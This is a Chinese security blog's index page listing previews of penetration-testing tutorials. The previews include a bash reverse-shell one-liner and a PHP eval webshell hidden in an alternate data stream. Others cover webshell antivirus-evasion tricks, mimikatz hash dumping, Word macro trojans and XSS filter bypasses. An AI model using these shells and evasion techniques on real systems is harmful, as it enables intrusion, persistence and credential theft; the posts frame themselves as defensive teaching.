- 博客(82)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 花里胡哨免杀《剪切板加载器》
前言最近研究内存加载器魔怔了,我们知道所有内存加载器原理都一个样:申请可执行内存->shellcode写入内存->执行该内存申请内存还是比较好说的,去win开发手册搜搜就能找到很多申请内存的api,然后使用VirtualProtect将申请的内存区块设置为可执行即可执行内存里面的内容也好说,使用CreateThread创建一个进程是常用的,或者使用EnumSystemLocalesA等回调函数直接运行也是可以的,这种回调函数在开发手册也随处可见困难的是怎么把shellcode写入内存当中
2021-09-16 10:18:39
1015
原创 反弹shell--bash一句话解析
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途反弹shell解析bash反弹shell解析拆分语句了解一下交互式连接设备文件描述符合并输入输出大合并bash反弹shell解析最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处真是妙蛙种子被踢出了米奇妙妙屋。。。bash -i >& /dev/tcp/192.168.1.1/8888 0>&1拆分语句了解一下交互式bash -i是打开一个.
2021-01-10 18:33:17
2942
3
原创 漏洞复现-Apache-FLink
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Apache-FLinkApache-FLink介绍两个漏洞远程代码命令执行利用过程批量测试本地文件读取利用过程Apache-FLink介绍Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。两个漏洞未授权.
2021-01-08 14:12:03
990
原创 XSS bypass姿势
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途XSS bypassXSS bypass姿势闭合标签标签绕过大小写绕过嵌套绕过空字符绕过img标签iframe标签input标签a标签svg标签body编码绕过JS16编码ASCII与UTF-16、Unicode、Hex相互转换String.fromCharCodedata协议字符过滤绕过空格单引号XSS bypass姿势尝试构造xss,突破各种限制闭合标签"><script&.
2020-12-24 15:18:05
442
原创 代码审计-phpcms
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途phpcms代码审计代码审计-phpcms低版本phpcms通读代码目录结构网站入口返回头看上面加载的几个函数库查看自动加载函数跳回index.php参数传递开始审计端口探测后台GetshellSQL注入代码审计-phpcms最近在学习php代码审计,各种复现、各种测试搞得我头昏脑胀。网上很多代码审计的复现博客看似讲的很清楚,最后自己也复现出来了,但是很多小白(比如我)以为懂了这个漏洞,但实际.
2020-12-14 16:01:35
456
原创 内网渗透-防火墙信息
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途防火墙信息防火墙信息查看配置操作防火墙设置出入站防火墙信息主要用来查看端口,开放端口通行查看配置netsh Firewall show state #查看防火墙状态netsh Firewall show config #查看防火墙配置netsh advfirewall Firewall #查看防火墙配置操作防火墙配置防火墙需要管理员权限netsh firewall s.
2020-12-06 16:49:53
533
原创 内网渗透-本机信息搜集
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途本机信息搜集本机信息搜集用户权限用户登录情况系统基本信息网络信息配置信息本地安装程序获取远程连接信息本机信息搜集搜集有用信息,主要是用来提权用户权限whoami /all #查看当前用户权限hostname #主机信息net user #用户列表net localgroup #查看所有组名,了解职能net localgroup "Administratorss" #查看指定组中的成.
2020-12-06 16:43:43
316
原创 内网渗透-内网穿透工具
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途WIN本地获取Hash内网穿透lcxnetshiptablesEarthworm端口复用reGeorg小结内网穿透想从外网渗透内网主机,但内网很多主机不直接连外网,所以要进行搭建通道(前提是已经控制了一台主机,通过这台主机渗透其他内网主机)win端口转发:lcx.exe netshlinux端口转发:portmap iptables多平台:Earthworm端口复用:reGeorg.
2020-12-06 12:57:47
1176
原创 内网渗透-获取WIN本地用户Hash
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途WIN本地获取Hashwin系统密码为什么要获取本地hash几种工具和获取方式注册表 + mimikatzProcdump + mimikatz直接mimikatz读取密码win系统密码Windows系统使用LM和NTLM两种方法对用户的密码进行加密处理,两种密码的加密方式在这有介绍Win本地hash概念但注意的是从win-server-2008开始默认禁止使用LM加密方式,统一使用NT.
2020-10-27 16:24:21
2208
原创 信息搜集-敏感信息泄露
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途信息泄露敏感信息作用1.robots.txt2. .git敏感文件3.物理路径泄露4.报错页面敏感信息泄漏5.备份文件泄露6.目录浏览7.其他乱七八糟总结敏感信息什么是敏感信息:敏感信息包括但不限于:口令、密钥、证书、会话标识、License、隐私数据、授权凭据、个人数据等、程序文件、配置文件、日志文件、备份文件等敏感信息相当的重要,如果能发现大量敏感信息你就是赚了。当然还是要介绍一下每.
2020-10-20 10:12:55
2231
原创 信息搜集-目录扫描
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途目录扫描目录原理爆破工具1.御剑后台扫描工具2.burp3.dirbuster4.dirb5. 常见fuzz工具爬虫工具长亭rad浏览器爬虫总结目录网站目录本质上就是我们的文件夹,不同的文件夹放着不同的文件。进行目录扫描是为了扩大测试范围,找到更多能利用的点。原理1.爆破目录扫描最常见的就是通过一个字典进行爆破,字典的精准度决定了你扫描的完整度。爆破的好处是能让我们发现一些隐藏页面,.
2020-10-19 10:36:00
7740
1
原创 信息搜集-指纹识别
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途指纹识别指纹常用网站和插件1.云悉指纹2.GodEye3.指纹什么是WEB指纹参考人的指纹,每个的指纹是多种多样的,通过办身份证进行指纹收集,可以快速匹配分辨出个人信息。WEB应用也有自己的指纹网页中的关键字,特点文件的md5值,特征码,第三方插件和cms独有的目录文件等等。web指纹识别就是通过正则表达式匹配这些特殊信息,识别web应用程序的名称和版本,语言类型,第三方组件,从而收集.
2020-10-17 10:24:59
2222
1
原创 信息搜集-子域名挖掘
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途子域名挖掘域名收集原理网站和工具1.在线子域名查询https://phpinfo.me/domain/2.一会儿~ https://dns.bufferover.run/dns?q=3. https://dnsdumpster.com/4.快速DNS rapiddns.io/subdomain5.crt.sh 证书查询4.Layer子域名挖掘机总结域名域名有级别之分,可以分为顶级域名(一级域.
2020-10-16 16:44:21
4964
3
原创 URL重定向-跳转绕过
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途URL重定向-跳转绕过URL重定向一般利用点利用姿势修复URL重定向服务端未对传入的跳转url变量进行检查和控制,可能导致可恶意构造任意一个恶意地址,诱导用户跳转到恶意网站。这个漏洞有啥危害呢????????我们普通人当看到一个网址,发现网站开头是自己熟悉(百度,谷歌)或者某一官网(感觉很安全的网址),就会没防护意识的点入进去,当该网站有url跳转漏洞,就会引导你跳转到一个不安全的网站,.
2020-10-15 15:08:03
16705
原创 PHP一句话木马免杀(3)
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.ADS隐藏。2.修改.htaccess文件3.修改php.ini4.一句话拆分小结免杀小技巧1.ADS隐藏。windows数据流有个很好的方式隐藏数据。通过命令行echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg会在本地生成一个shell.php文件,但打开却发现没有内容.
2020-10-14 10:15:29
931
1
原创 PHP一句话木马免杀(2)
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.隐藏php文件。2.逻辑判断木马3.数字运算构造木马4.内存木马,也称不死马。小结免杀小技巧1.隐藏php文件。在windows下有个attrib命令,能够帮助我们实现文件的隐藏。atttrib +s +a +h +r shell.php #隐藏atttrib -s -a -h -r shell.php #显示2.逻辑判断木马<? @eval.
2020-10-14 09:54:32
754
原创 python爬虫-豆瓣电影排行榜的演员信息
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途requests库爬取豆瓣电影排行榜的演员信息二话不说,先上代码执行结果二话不说,先上代码import requestsfrom lxml import etreefrom urllib.request import urlretrieveimport jsonurl = "https://movie.douban.com/j/chart/top_list?type=11&interva.
2020-09-23 13:12:58
1460
原创 python爬虫-获取校花网照片
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途requests库爬取校花网照片二话不说,先上代码执行结果二话不说,先上代码import requestsfrom lxml import etreefrom urllib.request import urlretrievebase_url = 'http://www.521609.com' #用于拼接url图片url = "http://www.521609.com/daxuexiaoh.
2020-09-23 13:06:52
478
2
原创 python爬虫-获取腾讯视频的弹幕
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途requests库爬取腾讯视频的弹幕二话不说,先上代码执行结果二话不说,先上代码import requestsheaders = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"}d.
2020-09-21 21:06:14
1312
1
原创 一个Word无形中控制你的电脑
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Word宏添加木马病毒前言创建木马word1.生成木马代码2.创建word文件3.打开msf监听注意==本文只是普及防木马和信息防御教学,切勿用于其他用途。==前言我们知道windows和inux的软件等等很容易被植入木马或者病毒。但你们知道word和excel文件依旧可以植入木马吗?office有个功能叫做宏,通常情况下是关闭状态,当有宏操作时候会提示你已经禁止了宏,问你咋整这情况普.
2020-09-21 13:34:37
988
原创 python的requests库的简单用法
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途requests库的简单用法简单介绍基础用法请求数据发送请求输出响应简单介绍requests是一个用于发送http/https请求的库,但一切核心是来自于urllib3库,相对于其他发送网络请求包的库,我感觉这个使用更加简单明了。这次主要记录一下requests的最基础的使用方法。中文手册网址:https://requests.readthedocs.io/zh_CN/latest/基础.
2020-09-19 10:24:33
352
原创 win常用的dos操作命令
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途win常用的dos操作命令吐槽常用的DOS命令操作文件系统配置用户操作其他常用吐槽最近学渗透学的可是脑袋快炸了,总觉得自己学到了挺多,但是就是不能融汇贯通,深刻反思了一下自己,发现自己的基础实在实在太差了,真就是一步难以登天啊。脑子笨,没办法,只能记笔记用到啥来查啥了。。。。常用的DOS命令也就是cmd命令,虽然概念不一样,懂那个意思就是操作文件dir: 用于显示当前路径下的文件.
2020-09-18 13:41:33
278
原创 Win下Docker与VM虚拟机不兼容
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Docker与VM虚拟机不兼容使用管理员权限运行命令近期在研究Win下的Docker,起初发现玩的流畅,当我要使用以前安装的VM虚拟机时,报错了给查了查错误内容发现vm虚拟机与Docker的主机服务冲突,那这可咋办没办法只能二选其一了。查找了各种解决方法,发现两条指令最好用使用管理员权限运行命令Docker是基于Hyper-V服务的,Hyper-V主机服务的运行可以用命令开启关闭Po.
2020-09-05 08:28:28
1039
3
原创 反黑客-script进行操作录像
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途反黑客-命令操作录像操作录像script录像scriptreplay播放录像自动记录黑客操作录像现在监控黑客有很多方法,比如蜜罐但是当黑客绕过了蜜罐,进入了我们真实主机环境,进行了一系列的操作,隐藏进程等等我们还是要留一手的,留一手用来监控黑客都干了啥,好来还原进程,找出隐藏的木马。在linux系统上有两个命令,script和scriptreplay能够对命令运行过程进行录像操作用法非.
2020-09-03 08:34:05
321
原创 XXE漏洞-内网探测
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途XXE漏洞-内网探测XXE漏洞危害CTF案例XXE漏洞XXE :Xml External Entity 外部实体注入攻击是利用一种xml的语言进行的注入攻击XXE漏洞原理就不详解了,一搜一大把危害可以读取系统文件获取源代码进行SSRF进行Phar触发反序列化CTF案例本文主要是针对一个CTF题https://buuoj.cn/challenges#[NCTF2019]Tr.
2020-08-21 18:33:10
2045
1
原创 SSRF漏洞-Gopher协议扩展利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Gopher协议扩展利用Gopher协议利用要点利用方式小案例ssrf利用redis写入webshellGopher协议Gopher在HTTP协议前是非常有名的信息查找系统,但是很老了,很少服务会用到它但是!在SSRF漏洞中,它大方光彩,让SSRF漏洞利用更加广泛利用此协议可以对ftp,memchahe,mysql,telnet,redis,等服务进行攻击,并可以构造发送GET,POST.
2020-08-20 10:21:04
2141
原创 内网渗透-SSRF漏洞
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途SSRF漏洞SSRF产生原因利用方式小案例1.请求内网资源2.端口扫描3.读取源文件4.Gopher://协议进行扩展攻击5.漏洞组合利用挖掘技巧1.传参方面2.web服务方面3.审计方面防御措施SSRFSSRF服务器端请求伪造,全英文Service_side Request Forgery 一般人也记不住主要利用漏洞来伪造成服务器端发起请求,比如绕过防火墙,进行内网探测,能够突破客户端获.
2020-08-19 15:35:21
984
2
原创 XFF漏洞利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途XFF漏洞X-Forwarded-For(XFF)利用方式1.绕过服务器过滤2.XFF导致sql注入补充X-Forwarded-For(XFF)XFF是header请求头中的一个参数是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。代表了HTTP的请求端真实的IP。X-Forwarded-For: client1, proxy1, p.
2020-08-15 11:15:52
7755
1
原创 Wfuzz模糊测试工具-能模糊的地方都能模糊
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Wfuzz模糊测试-URL爆破扫描WFUZZwfuzz参数wfuzz使用方法1、最基本模糊测试路径,文件名,参数值2.过滤显示3.POST请求测试4.指定Cookie5.递归扫描目录总结WFUZZwfuzz是用python开发的针对web的模糊测试工具,该工具实现功能相当于burp的爆破模块,可以自定义指定参数进行爆破测试。该工具在kali中已经安装并直接使用也可以用pip安装wfuzz.
2020-08-04 17:39:36
2416
转载 Win本地hash概念
转载https://www.secpulse.com/archives/65256.htmlWindows系统使用两种方法对用户的密码进行哈希处理它们分别是LAN Manager(LM)哈希和NT LAN Manager(NTLM)哈希。所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。现在已经有了更新的NTLMv2以及Kerberos验证体系。Windows加密过的密码口令,我们称之为has.
2020-08-03 12:17:33
673
原创 内网渗透-Winexe使用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Winexe使用,执行远程命令Winexe获取主机密码访问系统提升为system权限Winexewinexe是linux运行的windows系统管理工具,在渗透测试中可以通过各种方式获取被攻击主机的用户密码,再使用winexe控制主机winexe是通过文件共享服务,在目标系统安装winexe服并运行,执行命令完成后,会自动删除对应的服务,防止被发现。获取主机密码内网渗透过程中有各种各样方.
2020-08-03 11:14:43
1736
原创 内网渗透-Responder捕获Win哈希
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Responder捕获Win哈希实验环境Responder安装ResponderResponder参数获取NTLMv2哈希实验环境VM搭建的虚拟测试环境1.被攻击win7主机192.168.1.1302.kali 192.168.1.1313.win7配置netsh advfirewall set allprofiles state offwinrm quickconfigwinr.
2020-08-03 10:23:58
2832
原创 代码审计-php命令执行
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途php命令执行前言返回执行结果无返回执行结果命令执行小技巧1.在命令执行过程中,我们会遇到空格被删除或者替换的情况2.在命令执行过程中,我们会进行多条命令执行防范措施前言近期在学习php的代码审计,推一下这本书啊代码审计 企业级Web代码安全架构_尹毅著。前篇文章介绍过代码执行了,现在写写命令执行。命令执行就是执行命令,执行win和Linux的系统命令php中有好几个可以执行系统命令的.
2020-07-27 16:44:19
608
原创 PHP一句话木马免杀
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据免杀小技巧1.字符串拼接方式,构造敏感函数。<?php$a = 'ass';$b = 'er';$c = 't';$d = $a.$b.$c; //assert2.通过PHP的动态函数方法执行一句话。<.
2020-07-26 19:54:56
6182
4
原创 代码审计-php伪协议利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途php伪协议利用什么是伪协议常用协议1.file://访问本地文件系统2.php:// 访问各个输入/输出流3.data:// — 数据4.zip和phar总结什么是伪协议PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。file://访问本地文件系统http:.
2020-07-23 11:13:01
473
原创 Apache服务器.htaccess利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Apache服务器.htaccess利用了解.htaccess利用方式实现效果1.改变文件解码方式2.源码公开3.文件包含与代码执行4.远程文件包含与代码执行5.UTF-7编码实现XSS和PHP代码执行6.通过错误消息链接进行XSS总结了解.htaccess.htaccess文件是Apache的一个配置文件(没有文件名,只有一个后缀),他是改变某一目录单独的配置。通过htaccess文件,可.
2020-07-22 17:55:16
449
原创 代码审计-php代码执行
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于它用途php代码执行前言什么是代码执行,命令执行1.eval assert导致的代码执行2.preg_replace的e修饰符3.调用函数导致的代码执行4.动态函数执行ThinkPHP历史漏洞修复措施前言近期在学习php的代码审计,推一下这本书啊代码审计 企业级Web代码安全架构_尹毅著。在学习代码执行和命令执行中遇到很多的小问题,再本文章中记一下。先说几个php小要点:1.当代码赋值时用的.
2020-07-16 10:11:42
955
原创 python对Excel进行分类处理实战
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢办公效率提升小技巧python对Excel进行分类处理实战实现目的实现代码实现效果图实现目的1.在这有一个Excel表格根据第一列的序号进行了分类,有01234和空的没分类。本次实现将不同序号的产品进行分类,分别保存到对应的表格当中去。实现代码import openpyxltable = openpyxl.load_workbook('123.xlsx') #打开要处理的表格sheet = table['7月申请奖励'.
2020-07-13 15:25:29
3177
原创 python实现提取照片中的GPS坐标
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢python实现提取照片中的GPS坐标图片中的GPS实现代码读取的信息图片中的GPS通常我们拍的照片,除了我们所能看到的图像信息,图片中还存在着手机的信息,如果拍照时开启定位,照片中会存在GPS信息此次通过python提取图片中的GPS,并将度分秒格式转换成十进制,通过地图查找出拍摄位置。实现代码#文件名PictureGps.pyimport exifreadimport re#读取图片中的信息def FindGPSTi.
2020-07-13 14:36:36
2836
1
Yaazhini Setup 0.0.7.exe
2020-04-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人